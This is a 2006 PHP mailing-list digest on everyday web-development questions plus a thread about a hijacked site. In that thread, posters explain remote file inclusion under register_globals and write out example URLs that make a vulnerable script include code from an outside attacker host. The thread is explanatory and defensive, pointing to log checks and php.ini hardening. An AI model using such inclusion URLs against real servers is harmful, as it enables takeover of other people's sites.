php-general Digest 14 Nov 2006 06:16:51 -0000 Issue 4458
Topics (messages 244561 through 244583):
Re: Highjack?
244561 by: Matt Carlson
244562 by: Rory Browne
244563 by: bruce
Re: How do you do the ? mark after a filename
244564 by: Norbert Ehart
Scrolling text
244565 by: Alain Roger
244566 by: Robert Cummings
Re: one click - two actions?
244567 by: Mel
244569 by: Warren Vail
244571 by: Mel
244577 by: Warren Vail
Problem with PHP 5.2.0
244568 by: bluefx13.gmail.com
244580 by: Kevin Waterson
Re: Mysql strategy
244570 by: David Tulloh
244572 by: Robert Cummings
244578 by: Chris
244579 by: Larry Garfield
Compressing both php and linked css files with ob_gzhandler and htaccess
244573 by: Graham Anderson
244574 by: Jochem Maas
244575 by: Graham Anderson
244576 by: Graham Anderson
Re: server side security
244581 by: Chris
244582 by: Ligaya A. Turmelle
Re: problem with php[4,5] (horde 2/3)
244583 by: Chris
Administrivia:
To subscribe to the digest, e-mail:
[EMAIL PROTECTED]
To unsubscribe from the digest, e-mail:
[EMAIL PROTECTED]
To post to the list, e-mail:
php-general@lists.php.net
----------------------------------------------------------------------
--- Begin Message ---
With register_globals on, the globals super array ($_POST, $_GET, $_REQUEST)
are automatically populated into variables. With that in mind
www.example.com/index.php?path=remoteexplot.com/ would then yield
include('remoteexplit.com/foo'); thus including ANY code they wish.
----- Original Message ----
From: bruce <[EMAIL PROTECTED]>
To: Eric Butera <[EMAIL PROTECTED]>; tedd <[EMAIL PROTECTED]>
Cc: PHP General List <php-general@lists.php.net>
Sent: Monday, November 13, 2006 11:55:13 AM
Subject: RE: [PHP] Highjack?
eric...
you say how embarrasing regaring the $path.'foo'.... i'm curious, why/how is
this simple piece of code exploitable. assuming $path is not something that
comes via the url vars (GET/POST/REQUEST) it shouldn't be able to be touched
by external/client processes... similarly, the 'foo' would be static, and
couldn't be munged...
thoughts/explanations...
thanks
-----Original Message-----
From: Eric Butera [mailto:[EMAIL PROTECTED]
Sent: Monday, November 13, 2006 9:39 AM
To: tedd
Cc: PHP General List
Subject: Re: [PHP] Highjack?
On 11/13/06, tedd <[EMAIL PROTECTED]> wrote:
> Hi gang:
>
> While this is not an obvious php question, it does deal with security
> which is a concern.
>
> Just this morning had a couple of my sites "highjacked". What I found
> was someone had replaced my root level index.php with their own
> index.php. You can see the result at:
>
> http://xn--u2g.com/index1.php
>
> It was not a terrible loss nor inconvenience, but I wonder how they
> did it. Any ideas how this was done and suggestions as to how to
> prevent this from happening again?
>
> Thanks,
>
> tedd
>
> --
> -------
> http://sperling.com http://ancientstones.com http://earthstones.com
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
Tedd,
I've seen this happen before when someone was able to do a remote code
execution exploit on an old version of a very popular open source
shopping cart project. I'd say the first thing would be to try and
find any include/require statements that are exploitable. In the case
I was dealing with, it was a problem with register_globals on and an
include that looked a bit like this include($path .'script.php');.
How embarrassing.
If you have access to your server logs look for urls such as
http://example.com/exploited.php?action=http://evil.example.com/inject.txt.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--- End Message ---
--- Begin Message ---
---------- Forwarded message ----------
From: Rory Browne <[EMAIL PROTECTED]>
Date: Nov 13, 2006 7:12 PM
Subject: Re: [PHP] Highjack?
To: [EMAIL PROTECTED]
On 11/13/06, bruce <[EMAIL PROTECTED]> wrote:
eric...
you say how embarrasing regaring the $path.'foo'.... i'm curious, why/how
is
this simple piece of code exploitable. assuming $path is not something
that
comes via the url vars (GET/POST/REQUEST)
If register_globals is enabled, someone could
http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy=
The script will then include
http://www.badserver.com/badscript.txt?dummy=script.php
it shouldn't be able to be touched
by external/client processes... similarly, the 'foo' would be static, and
couldn't be munged...
thoughts/explanations...
thanks
-----Original Message-----
From: Eric Butera [mailto:[EMAIL PROTECTED]
Sent: Monday, November 13, 2006 9:39 AM
To: tedd
Cc: PHP General List
Subject: Re: [PHP] Highjack?
On 11/13/06, tedd <[EMAIL PROTECTED]> wrote:
> Hi gang:
>
> While this is not an obvious php question, it does deal with security
> which is a concern.
>
> Just this morning had a couple of my sites "highjacked". What I found
> was someone had replaced my root level index.php with their own
> index.php. You can see the result at:
>
> http://xn--u2g.com/index1.php
>
> It was not a terrible loss nor inconvenience, but I wonder how they
> did it. Any ideas how this was done and suggestions as to how to
> prevent this from happening again?
>
> Thanks,
>
> tedd
>
> --
> -------
> http://sperling.com http://ancientstones.com http://earthstones.com
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
Tedd,
I've seen this happen before when someone was able to do a remote code
execution exploit on an old version of a very popular open source
shopping cart project. I'd say the first thing would be to try and
find any include/require statements that are exploitable. In the case
I was dealing with, it was a problem with register_globals on and an
include that looked a bit like this include($path .'script.php');.
How embarrassing.
If you have access to your server logs look for urls such as
http://example.com/exploited.php?action=http://evil.example.com/inject.txt
.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--- End Message ---
--- Begin Message ---
rory..
thanks.. i had meant to say assuming globals is off...
-----Original Message-----
From: Rory Browne [mailto:[EMAIL PROTECTED]
Sent: Monday, November 13, 2006 10:12 AM
To: PHP
Subject: Fwd: [PHP] Highjack?
---------- Forwarded message ----------
From: Rory Browne <[EMAIL PROTECTED]>
Date: Nov 13, 2006 7:12 PM
Subject: Re: [PHP] Highjack?
To: [EMAIL PROTECTED]
On 11/13/06, bruce <[EMAIL PROTECTED]> wrote:
>
> eric...
>
> you say how embarrasing regaring the $path.'foo'.... i'm curious, why/how
> is
> this simple piece of code exploitable. assuming $path is not something
> that
> comes via the url vars (GET/POST/REQUEST)
If register_globals is enabled, someone could
http://www.example.com/badscript.php?path=http://www.badserver.com/badscript
.txt?dummy=
The script will then include
http://www.badserver.com/badscript.txt?dummy=script.php
it shouldn't be able to be touched
> by external/client processes... similarly, the 'foo' would be static, and
> couldn't be munged...
>
> thoughts/explanations...
>
> thanks
>
>
>
> -----Original Message-----
> From: Eric Butera [mailto:[EMAIL PROTECTED]
> Sent: Monday, November 13, 2006 9:39 AM
> To: tedd
> Cc: PHP General List
> Subject: Re: [PHP] Highjack?
>
>
> On 11/13/06, tedd <[EMAIL PROTECTED]> wrote:
> > Hi gang:
> >
> > While this is not an obvious php question, it does deal with security
> > which is a concern.
> >
> > Just this morning had a couple of my sites "highjacked". What I found
> > was someone had replaced my root level index.php with their own
> > index.php. You can see the result at:
> >
> > http://xn--u2g.com/index1.php
> >
> > It was not a terrible loss nor inconvenience, but I wonder how they
> > did it. Any ideas how this was done and suggestions as to how to
> > prevent this from happening again?
> >
> > Thanks,
> >
> > tedd
> >
> > --
> > -------
> > http://sperling.com http://ancientstones.com http://earthstones.com
> >
> > --
> > PHP General Mailing List (http://www.php.net/)
> > To unsubscribe, visit: http://www.php.net/unsub.php
> >
> >
>
> Tedd,
>
> I've seen this happen before when someone was able to do a remote code
> execution exploit on an old version of a very popular open source
> shopping cart project. I'd say the first thing would be to try and
> find any include/require statements that are exploitable. In the case
> I was dealing with, it was a problem with register_globals on and an
> include that looked a bit like this include($path .'script.php');.
> How embarrassing.
>
> If you have access to your server logs look for urls such as
> http://example.com/exploited.php?action=http://evil.example.com/inject.txt
> .
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
--- End Message ---
--- Begin Message ---
Thomas Bonham schrieb:
I keep seeing the ? mark after many file names index.php?id=234.
So what I would like to know is how do you make them. I have heard that
they can make a programs life sampler when doing somethings with a
database.
in my scripts, i do it with the switch-syntax
=== snip ===
switch($_GET['x'])
{
case "show": include("show.php"); break;
case "search": include("search.php"); break;
case "new": include("add_entry.html"); break;
default: include("show.php"); break;
}
?>
=== snip ===
now you can enter http://www.domain.at/index.php?x=search; or x=show;
cu,
norbert.
--- End Message ---
--- Begin Message ---
Hi,
I would like to have a scrolling text (as banner) on our website.
I tried Marquee which work very well but since i use a table and allocate
100% to marquee, if the content of a row (<tr> content) is greater than 100%
or the <table> width, internet explorer automatically write the message on
several lines (not several <tr>).
e.g :
sentence to display : "this is a very long sentence about the way how works
internet explorer with marquee"
way how is it displays under IE :
"this is a very long sentence about the way
how works internet explorer with marquee"
under opera and firefow, it's well displayed as "this is a very long
sentence about the way how works internet explorer with marquee"
so, i would like to know if there is another way how to do a scrolling text
without using flash, shockwave or other tool...only in php or HTML (in worse
case).
thanks a lot,
--
Alain
------------------------------------
Windows XP SP2
PostgreSQL 8.1.4
Apache 2.0.58
PHP 5
--- End Message ---
--- Begin Message ---
On Mon, 2006-11-13 at 20:22 +0100, Alain Roger wrote:
> Hi,
>
> I would like to have a scrolling text (as banner) on our website.
> I tried Marquee which work very well but since i use a table and allocate
> 100% to marquee, if the content of a row (<tr> content) is greater than 100%
> or the <table> width, internet explorer automatically write the message on
> several lines (not several <tr>).
>
> e.g :
>
> sentence to display : "this is a very long sentence about the way how works
> internet explorer with marquee"
>
> way how is it displays under IE :
> "this is a very long sentence about the way
> how works internet explorer with marquee"
>
> under opera and firefow, it's well displayed as "this is a very long
> sentence about the way how works internet explorer with marquee"
>
> so, i would like to know if there is another way how to do a scrolling text
> without using flash, shockwave or other tool...only in php or HTML (in worse
> case).
>
> thanks a lot,
This works really well without the annoyance:
<div style="overflow: scroll; white-space: nowrap;">
this is a very long sentence about the way how works internet explorer
with marquee
</div>
Cheers,
Rob.
--
.------------------------------------------------------------.
| InterJinn Application Framework - http://www.interjinn.com |
:------------------------------------------------------------:
| An application and templating framework for PHP. Boasting |
| a powerful, scalable system for accessing system services |
| such as forms, properties, sessions, and caches. InterJinn |
| also provides an extremely flexible architecture for |
| creating re-usable components quickly and easily. |
`------------------------------------------------------------'
--- End Message ---
--- Begin Message ---
I really don't know?
My site is all php and ready to go live except for this little problem.
I would really appreciate some help.
On Nov 13, 2006, at 4:12 AM, John Meyer wrote:
Not to be rude or anything, but if you want to do two things with one
click, wouldn't the javascript list be the place you would want to go?
--- End Message ---
--- Begin Message ---
Mel, that may have been a disguised hint. Your answer lies in
javascript. The first php page needs to contain javascript to open a
second page with the URL to the second php script when the first page
loads.
Keep a couple of things in mind, popup blockers will reek havoc if you
can't get visitors to your site to stop blocking popups and if you
expect both URLs to receive form contents, you will have to make
arrangements for that in the javascript in your first page, since it
will need to pass the data again.
Check out http://www.hotscripts.com for some links to sites with the
necessary javascript.
Hope this helps,
Warren Vail
-----Original Message-----
From: Mel [mailto:[EMAIL PROTECTED]
Sent: Monday, November 13, 2006 12:32 PM
To: John Meyer
Cc: PHP General List
Subject: Re: [PHP] one click - two actions?
I really don't know?
My site is all php and ready to go live except for this little problem.
I would really appreciate some help.
On Nov 13, 2006, at 4:12 AM, John Meyer wrote:
> Not to be rude or anything, but if you want to do two things with one
> click, wouldn't the javascript list be the place you would want to go?
--- End Message ---
--- Begin Message ---
Thank you for your reply. I think my question is really much more
simple than what you are suggesting.
If you have a quick look at
http://www.squareinch.net/single_page.php?art=crp_logo.jpg
you will see what I mean.
I have a single page and both results load in the same page.
When I click on a link the picture loads on the left side and the
info should load on the right side.
Right now the info is visible at all times regardless of what I click
on!
I need to know how to join my echo statements and/or my query!
On Nov 13, 2006, at 12:57 PM, Warren Vail wrote:
Mel, that may have been a disguised hint. Your answer lies in
javascript. The first php page needs to contain javascript to open a
second page with the URL to the second php script when the first page
loads.
Keep a couple of things in mind, popup blockers will reek havoc if you
can't get visitors to your site to stop blocking popups and if you
expect both URLs to receive form contents, you will have to make
arrangements for that in the javascript in your first page, since it
will need to pass the data again.
Check out http://www.hotscripts.com for some links to sites with the
necessary javascript.
Hope this helps,
Warren Vail
-----Original Message-----
From: Mel [mailto:[EMAIL PROTECTED]
Sent: Monday, November 13, 2006 12:32 PM
To: John Meyer
Cc: PHP General List
Subject: Re: [PHP] one click - two actions?
I really don't know?
My site is all php and ready to go live except for this little
problem.
I would really appreciate some help.
On Nov 13, 2006, at 4:12 AM, John Meyer wrote:
Not to be rude or anything, but if you want to do two things with one
click, wouldn't the javascript list be the place you would want to
go?
--- End Message ---
--- Begin Message ---
Mel,
Not sure if I understand your question now or not, but here goes. In
order to prepare your page you want to be able to click a link on the
left and have the page on the right replaced with something in response.
Technically when php prepares the page, it prepares both sides (unless
you are using frames). If preparing each side requires different
queries against your database, you can certainly do two database queries
in the same execution. When you first posed your question you talked
about starting two pages at once. What I see is one page. Perhaps if
you used frames you could cause the left frame to be a separate PHP
script and the one on the right another, this would allow your server to
process both requests simultaneously, perhaps this is what you meant?
Technically they are still part of the one page, but each would be a
separate frame within the page.
Caution about using technical terms, in your first message you referred
to separate pages when (I believe) you may have been referring to one
page (yes, page is a technical term) and in your second message you used
a term "Join" which has a meaning when running queries on your database,
causing me to think for a moment that your question had been about
retrieving information from your database, which you seemed to mention.
If you opt to use frames and are new to PHP programming, or programming
with frames, expect difficulties (use of Target consistently is the
key). I avoid frames unless I simply can't do what I want to do without
the use of them. I think at one time some browsers didn't support
frames, not sure any more.
Warren Vail
-----Original Message-----
From: Mel [mailto:[EMAIL PROTECTED]
Sent: Monday, November 13, 2006 1:32 PM
To: Warren Vail
Cc: 'John Meyer'; 'PHP General List'
Subject: Re: [PHP] one click - two actions?
Thank you for your reply. I think my question is really much more
simple than what you are suggesting.
If you have a quick look at
http://www.squareinch.net/single_page.php?art=crp_logo.jpg
you will see what I mean.
I have a single page and both results load in the same page.
When I click on a link the picture loads on the left side and the
info should load on the right side.
Right now the info is visible at all times regardless of what I click
on!
I need to know how to join my echo statements and/or my query!
On Nov 13, 2006, at 12:57 PM, Warren Vail wrote:
>
> Mel, that may have been a disguised hint. Your answer lies in
> javascript. The first php page needs to contain javascript to open a
> second page with the URL to the second php script when the first page
> loads.
>
> Keep a couple of things in mind, popup blockers will reek havoc if you
> can't get visitors to your site to stop blocking popups and if you
> expect both URLs to receive form contents, you will have to make
> arrangements for that in the javascript in your first page, since it
> will need to pass the data again.
>
> Check out http://www.hotscripts.com for some links to sites with the
> necessary javascript.
>
> Hope this helps,
>
> Warren Vail
>
> -----Original Message-----
> From: Mel [mailto:[EMAIL PROTECTED]
> Sent: Monday, November 13, 2006 12:32 PM
> To: John Meyer
> Cc: PHP General List
> Subject: Re: [PHP] one click - two actions?
>
> I really don't know?
>
> My site is all php and ready to go live except for this little
> problem.
>
> I would really appreciate some help.
>
> On Nov 13, 2006, at 4:12 AM, John Meyer wrote:
>
>> Not to be rude or anything, but if you want to do two things with one
>> click, wouldn't the javascript list be the place you would want to
>> go?
>
>
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--- End Message ---
--- Begin Message ---
Hi. I just installed PHP 5.2.0 and I'm running into some strange problems.
I have a rather large program which uses sockets, pcntl, posix, pdo
(mysql), and is fully object oriented. The program is rather large and
is about 75,000 lines of code.
When I run the application with PHP 5.1.6, I can execute commands in
around 0.6 to 0.8 seconds, uses less then 1% cpu power, and takes around
14 megs of ram.
I installed PHP 5.2.0 and when I execute a command (through my
application), it takes 9 to 12 seconds to complete, it uses 100% cpu
power, and eats about 180 megs of ram.
Nothing changed other then installing PHP 5.2.0. I have reinstalled
5.1.6 and everything is back to normal. I have compiled both versions
the exact same way with the same command line options.
Are there any outstanding issues with PHP 5.2.0? Anyone have any similar
problems?
I don't want to go through my source code to find where 5.2.0 is hanging
so I'm hoping there is a known issue already documented out there.
Here is config line:
./configure --prefix=/usr/local/php5 --libdir=/usr/local/php
--with-config-file-path=/usr/local/php --with-zlib --with-mcrypt
--enable-cli --without-pear --enable-libgcc --with-curl --enable-sockets
--enable-pcntl --enable-posix --enable-sigchild --disable-cgi
--with-pdo-mysql --with-imap-ssl=/usr/local/imap-2006c1 --with-openssl
--enable-ftp
Any help would be appreciated.
Thanks,
John W.
--- End Message ---
--- Begin Message ---
This one time, at band camp, "[EMAIL PROTECTED]" <[EMAIL PROTECTED]> wrote:
> Hi. I just installed PHP 5.2.0 and I'm running into some strange problems.
xdebug
Kevin
--
"Democracy is two wolves and a lamb voting on what to have for lunch.
Liberty is a well-armed lamb contesting the vote."
--- End Message ---
--- Begin Message ---
Dotan Cohen wrote:
If I have to perform 30 LIKE searches for different keywords in a
varchar field, which strategy would be recommended:
1) 30 searches, one for each keyword
2) To select the varchar field from all the rows, and search through
them with php's array functions?
It's not going to make a great deal of difference if you do the
processing in the MySQL or the PHP, in this case it's basically the same
operation in each. I suspect that efficiently recreating the LIKE
functionality in PHP wouldn't be trivial to do, if you are just doing
straight comparisons the MySQL STRCMP function should be faster.
If you are worried about the speed of this query I'd suggest rethinking
your database structure. Text field comparisons will always be
relatively slow compared to numeric comparisons or numeric lookups. My
reading of this query however is that it should be 30 OR comparisons, no
joins involved. In this case the query will scale linearly with your
database size so you shouldn't worry too much about it slowing down over
time.
David
--- End Message ---
--- Begin Message ---
On Tue, 2006-11-14 at 00:51 +1100, David Tulloh wrote:
> Dotan Cohen wrote:
> > If I have to perform 30 LIKE searches for different keywords in a
> > varchar field, which strategy would be recommended:
> > 1) 30 searches, one for each keyword
> > 2) To select the varchar field from all the rows, and search through
> > them with php's array functions?
>
> It's not going to make a great deal of difference if you do the
> processing in the MySQL or the PHP, in this case it's basically the same
> operation in each. I suspect that efficiently recreating the LIKE
> functionality in PHP wouldn't be trivial to do, if you are just doing
> straight comparisons the MySQL STRCMP function should be faster.
>
> If you are worried about the speed of this query I'd suggest rethinking
> your database structure. Text field comparisons will always be
> relatively slow compared to numeric comparisons or numeric lookups. My
> reading of this query however is that it should be 30 OR comparisons, no
Except that most search engines refine the search when you add more
keywords in contrast to your suggestion of expanding the search :)
Cheers,
Rob.
--
.------------------------------------------------------------.
| InterJinn Application Framework - http://www.interjinn.com |
:------------------------------------------------------------:
| An application and templating framework for PHP. Boasting |
| a powerful, scalable system for accessing system services |
| such as forms, properties, sessions, and caches. InterJinn |
| also provides an extremely flexible architecture for |
| creating re-usable components quickly and easily. |
`------------------------------------------------------------'
--- End Message ---
--- Begin Message ---
David Tulloh wrote:
Dotan Cohen wrote:
If I have to perform 30 LIKE searches for different keywords in a
varchar field, which strategy would be recommended:
1) 30 searches, one for each keyword
2) To select the varchar field from all the rows, and search through
them with php's array functions?
It's not going to make a great deal of difference if you do the
processing in the MySQL or the PHP, in this case it's basically the same
operation in each. I suspect that efficiently recreating the LIKE
functionality in PHP wouldn't be trivial to do, if you are just doing
straight comparisons the MySQL STRCMP function should be faster.
I'd say there will be a big difference. Pulling in 10,000 entries from
the database and then sorting them in php will take a lot of memory (and
database time to retrieve all of the entries). Getting the database to
restrict that number of entries will take a little time but it doesn't
have to return all entries, your php memory won't blow out and it won't
have bugs in it.
--
Postgresql & php tutorials
http://www.designmagick.com/
--- End Message ---
--- Begin Message ---
On Monday 13 November 2006 17:51, Chris wrote:
> > It's not going to make a great deal of difference if you do the
> > processing in the MySQL or the PHP, in this case it's basically the same
> > operation in each. I suspect that efficiently recreating the LIKE
> > functionality in PHP wouldn't be trivial to do, if you are just doing
> > straight comparisons the MySQL STRCMP function should be faster.
>
> I'd say there will be a big difference. Pulling in 10,000 entries from
> the database and then sorting them in php will take a lot of memory (and
> database time to retrieve all of the entries). Getting the database to
> restrict that number of entries will take a little time but it doesn't
> have to return all entries, your php memory won't blow out and it won't
> have bugs in it.
As a general rule, I try to push as much logic into the query as I can for the
simple reason that MySQL is optimized C and my PHP code gets interpreted.
The odds of me writing something in PHP that's faster than MySQL AB's C code
are slim. :-) The exception is grouping, which I've often had to do in PHP
with a loop to rebuild a result array. The performance hit for that is not
that big, however, and if you free() the result set afterward then the memory
usage is not a major issue either.
If you're finding your query is slow, look into your indexes. Just today I
cut a single query from 230 seconds to 21 seconds just by adding two
indexes. :-)
--
Larry Garfield AIM: LOLG42
[EMAIL PROTECTED] ICQ: 6817012
"If nature has made any one thing less susceptible than all others of
exclusive property, it is the action of the thinking power called an idea,
which an individual may exclusively possess as long as he keeps it to
himself; but the moment it is divulged, it forces itself into the possession
of every one, and the receiver cannot dispossess himself of it." -- Thomas
Jefferson
--- End Message ---
--- Begin Message ---
Can I compress a php file AND its referenced css files at the same
time ?
Currently, I am using ob_gzhandler to compress my php files only .
Works great:)
As I have found that you CAN NOT use ob_gz and zlib at the same time,
how do I amend the htaccess file to use ob_gz,
These files are in my CSS folder along with style.css.
.
.htaccess
AddHandler application/x-httpd-php .css
php_value auto_prepend_file gzip-css.php
php_flag zlib.output_compression On
gzip-css.php
<?php
ob_start ("ob_gzhandler");
header("Content-type: text/css; charset: UTF-8");
header("Cache-Control: must-revalidate");
$offset = 60 * 60 ;
$ExpStr = "Expires: " .
gmdate("D, d M Y H:i:s",
time() + $offset) . " GMT";
header($ExpStr);
?>
many thanks as I am learning the ins and outs of htaccess and
ob_gzhandler
--- End Message ---
--- Begin Message ---
Graham Anderson wrote:
> Can I compress a php file AND its referenced css files at the same time ?
>
> Currently, I am using ob_gzhandler to compress my php files only .
> Works great:)
>
>
> As I have found that you CAN NOT use ob_gz and zlib at the same time,
> how do I amend the htaccess file to use ob_gz,
er ...
>
> These files are in my CSS folder along with style.css.
> .
> .htaccess
> AddHandler application/x-httpd-php .css
> php_value auto_prepend_file gzip-css.php
> php_flag zlib.output_compression On
php_flag zlib.output_compression Off
>
no?
> gzip-css.php
> <?php
> ob_start ("ob_gzhandler");
> header("Content-type: text/css; charset: UTF-8");
> header("Cache-Control: must-revalidate");
> $offset = 60 * 60 ;
> $ExpStr = "Expires: " .
> gmdate("D, d M Y H:i:s",
> time() + $offset) . " GMT";
> header($ExpStr);
> ?>
>
> many thanks as I am learning the ins and outs of htaccess and ob_gzhandler
>
> --PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
--- End Message ---
--- Begin Message ---
yes :)
I DID try that
strangely, turning it off disables/kills the css file
g
On Nov 13, 2006, at 2:08 PM, Jochem Maas wrote:
Graham Anderson wrote:
Can I compress a php file AND its referenced css files at the
same time ?
Currently, I am using ob_gzhandler to compress my php files only .
Works great:)
As I have found that you CAN NOT use ob_gz and zlib at the same time,
how do I amend the htaccess file to use ob_gz,
er ...
These files are in my CSS folder along with style.css.
.
.htaccess
AddHandler application/x-httpd-php .css
php_value auto_prepend_file gzip-css.php
php_flag zlib.output_compression On
php_flag zlib.output_compression Off
no?
gzip-css.php
<?php
ob_start ("ob_gzhandler");
header("Content-type: text/css; charset: UTF-8");
header("Cache-Control: must-revalidate");
$offset = 60 * 60 ;
$ExpStr = "Expires: " .
gmdate("D, d M Y H:i:s",
time() + $offset) . " GMT";
header($ExpStr);
?>
many thanks as I am learning the ins and outs of htaccess and
ob_gzhandler
--PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--- End Message ---
--- Begin Message ---
Unfortunately, I am on a shared server for this project :(
Is there some way to enable mod_deflate without admin server privs?
many thanks
On Nov 13, 2006, at 1:59 PM, steve wrote:
Why use php to compress at all? Use mod_deflate.
On 11/13/06, Graham Anderson <[EMAIL PROTECTED]> wrote:
Can I compress a php file AND its referenced css files at the same
time ?
Currently, I am using ob_gzhandler to compress my php files only .
Works great:)
As I have found that you CAN NOT use ob_gz and zlib at the same time,
how do I amend the htaccess file to use ob_gz,
These files are in my CSS folder along with style.css.
.
.htaccess
AddHandler application/x-httpd-php .css
php_value auto_prepend_file gzip-css.php
php_flag zlib.output_compression On
gzip-css.php
<?php
ob_start ("ob_gzhandler");
header("Content-type: text/css; charset: UTF-8");
header("Cache-Control: must-revalidate");
$offset = 60 * 60 ;
$ExpStr = "Expires: " .
gmdate("D, d M Y H:i:s",
time() + $offset) . " GMT";
header($ExpStr);
?>
many thanks as I am learning the ins and outs of htaccess and
ob_gzhandler
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--- End Message ---
--- Begin Message ---
H. Dan Phillips wrote:
Let me begin by saying I'm a newbie to PHP and open source. I setup a
windows 2003 server with IIS6, PHP 5x and MYSQL5x for one of our
developers to start building a new web based application. The developer
will be using PHP myadmin for his purposes. The settings that were used
were ones posted out on many web sites for this combo. I'm looking for
detailed instructions to secure the server from the standpoint of the
server OS, php.ini and mysql. The developer will be securing access to
the application from his end but I want to make sure that the server
also remain secure. It will only be used within our intra-net and only
by a handful of people. Any and all suggestions will be greatly
appreciated.
We can't offer advice on the OS or mysql - find a more specific mailing
list for those questions.
For the php.ini, disable allow_url_fopen (or if you're using php 5.2.0,
disable allow_url_include at least) and disable register_globals.
Depending on what the application does, I'd look at disabling exec,
system and the like (see http://php.net/exec & look for
"disable_functions" in the php.ini file).
Turn off enable_dl unless you have a specific need for it.
Only enable the extensions you need to use (ie don't enable oracle
support if you aren't going to use it).
Having said that - most of the php security problems relate to the
application, rather than the php.ini file.
--
Postgresql & php tutorials
http://www.designmagick.com/
--- End Message ---
--- Begin Message ---
<assuming this is possible - not a sys admin - so can be way out of my
league>
Have you thought not having it available on the open web? Put it behind
a firewall and make it so only local ips on the LAN can access it with
strong passwords. MySQL - make sure you change the default root user
password to something "hard" - and create only users with the minimum
permissions needed that can only access say from the localhost.
</assumption>
-----Original Message-----
From: H. Dan Phillips [mailto:[EMAIL PROTECTED]
Sent: Tuesday, November 14, 2006 1:44 AM
To: php-general@lists.php.net
Subject: [PHP] server side security
Let me begin by saying I'm a newbie to PHP and open source. I setup a
windows 2003 server with IIS6, PHP 5x and MYSQL5x for one of our
developers to start building a new web based application. The developer
will be using PHP myadmin for his purposes. The settings that were used
were ones posted out on many web sites for this combo. I'm looking for
detailed instructions to secure the server from the standpoint of the
server OS, php.ini and mysql. The developer will be securing access to
the application from his end but I want to make sure that the server
also remain secure. It will only be used within our intra-net and only
by a handful of people. Any and all suggestions will be greatly
appreciated.
Thks Dan Phillips
--- End Message ---
--- Begin Message ---
Norbert Ehart wrote:
hello,
i have some problem with horde, after my isp have upgraded php on my
vps! i only get some error massages.
Notice: Only variable references should be returned by reference in
/usr/share/horde3/lib/Horde/Perms.php on line 343
Notice: Only variable references should be returned by reference in
/usr/share/horde3/lib/Horde/Auth.php on line 1193
Warning: Cannot modify header information - headers already sent by
(output started at /usr/share/horde3/lib/Horde/Perms.php:343) in
/usr/share/horde3/index.php on line 51
Talk to the horde mailing list / forum. They need to fix this properly.
--
Postgresql & php tutorials
http://www.designmagick.com/
--- End Message ---
